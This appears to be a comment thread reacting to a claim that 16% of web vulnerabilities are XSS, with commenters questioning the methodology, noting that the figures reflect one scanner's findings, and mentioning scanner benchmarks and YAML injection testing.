16% of web vulnerabilities are still XSS

I assume they're not tracking CSRF, since CSRF tends to be much more common than XSS.

Big variance in vulnerability seriousness across that spectrum... but if you've found 100K+ vulns and 2.5% are SQL injection, that's a lot of big holes!

How did you test for YAML injection? From my past experiences with Ruby (hardly any) YAML injection is difficult to test from a blackbox perspective as you need an understanding of the source code in order to be able to craft the appropriate serialized YAML object to yield code execution.

Title is wrong. Instead of saying that 16% of web vulns are XSS, it should say that 16% of the findings reported by this particular product&#x2F;service are XSS.<p>Web vulnerability scanners can diff a lot in their results. Crawling algos&#x2F;site coverage, finding and using different input vectors, specific testing methods &amp;c are all very different across various products. Sectoolmarket is a good resource with results from WIVET (crawl tests more or less) and WAVSEP (detecting vulnerabilities). Even so, those benchmarks only cover a very small portion of possible web application attack vectors. And let&#x27;s not forget the problem of crawling &quot;The Deep Web&quot; i.e., stateful web applications.<p>TL;DR: title is wrong.

16% of web vulnerabilities <i>found by a scanner</i> are still XSS.